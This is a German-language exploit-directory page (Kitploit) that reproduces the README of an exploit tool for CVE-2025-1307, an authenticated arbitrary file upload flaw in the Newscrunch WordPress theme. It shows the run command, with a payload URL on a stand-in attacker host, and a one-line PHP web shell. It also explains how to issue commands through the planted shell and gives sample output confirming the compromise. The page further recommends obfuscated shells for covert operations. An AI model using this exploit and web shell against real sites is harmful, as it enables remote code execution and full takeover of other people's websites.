Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - Authentifiziert (Abonnent+) Beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-1307
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - Authentifiziert (Abonnent+) Beliebiger Datei-Upload

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Newscrunch Exploit (CVE-2025-1307)

🚨 Übersicht

Dieser Exploit zielt auf eine kritische Sicherheitslücke (CVE-2025-1307) im Newscrunch WordPress-Theme ab. Der Fehler ermöglicht authentifizierten Benutzern (Abonnent und höher) das Hochladen beliebiger Dateien aufgrund fehlender Berechtigungsprüfungen in der Funktion newscrunch_install_and_activate_plugin(). Dies kann zu Remote Code Execution (RCE) führen, wodurch die betroffene WordPress-Website vollständig kompromittiert wird.


🔥 Schwachstellendetails

  • CVE ID: CVE-2025-1307
  • Betroffene Software: Newscrunch WordPress-Theme (<= 1.8.4.1)
  • CWE-Klassifizierung: CWE-862 – Fehlende Autorisierung
  • CVSS Score: 9.8 (Kritisch)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Veröffentlichungsdatum: 4. März 2025

🛑 Schweregrad & Auswirkungen

  • ✅ Remote Code Execution (RCE)
  • ✅ Vollständige Systemkompromittierung
  • ✅ Unbefugter Dateiupload
  • ✅ Risiko der Rechteausweitung

Ausnutzbarkeit: Erfordert ein gültiges WordPress-Konto mit Abonnentenrechten oder höher.


📜 Skriptfunktionen

✅ Automatisierte Ausnutzung von CVE-2025-1307
✅ Automatische Erkennung der verwundbaren Theme-Version
✅ Automatische Extraktion und Ausführung der ZIP-Nutzlast
✅ Dynamisches Abrufen des Shell-Dateinamens aus der ZIP
✅ Automatische Überprüfung der Shell-Verfügbarkeit nach der Ausnutzung
✅ Saubere und strukturierte Protokollierung zur Fehlersuche


🚀 Verwendung

📌 Voraussetzungen

Stellen Sie sicher, dass Python 3.x installiert ist, und installieren Sie die erforderlichen Abhängigkeiten:

root@kitploit:~
pip install requests urllib3 packaging

🔧 Ausführen des Exploits

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 Nutzung

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ Verwenden der hochgeladenen Shell

Sobald die Shell erfolgreich hochgeladen wurde, ermöglicht sie die Remote-Befehlsausführung auf dem Zielsystem. Die Shell-Datei sollte in einem ZIP-Archiv abgelegt werden und wird bei der Ausnutzung automatisch extrahiert.

🔹 Erstellen der ZIP-Nutzlast

Stellen Sie sicher, dass sich Ihre PHP-Shell (shell.php) in einem ZIP-Archiv befindet. Laden Sie dann die ZIP-Datei mit dem Exploit hoch.

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 Befehle ausführen

Sie können Systembefehle über den Browser ausführen, indem Sie den cmd-Parameter an die Shell-URL anhängen:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ Sichern der Shell

  • Da es sich um eine einfache Webshell handelt, fehlt die Authentifizierung und sie sollte vorsichtig verwendet werden.
  • Wenn sie entdeckt wird, kann sie von Administratoren leicht entfernt werden.
  • Erwägen Sie die Verwendung von verschleiertem PHP-Code oder passwortgeschützten Shells für verdeckte Operationen.

🔹 Erwartete Ausgabe

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die unbefugte Ausnutzung von Schwachstellen ist illegal und strafbar. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Verwenden Sie es verantwortungsbewusst.

Von: Nxploit | Khaled Alenazi

Tool herunterladen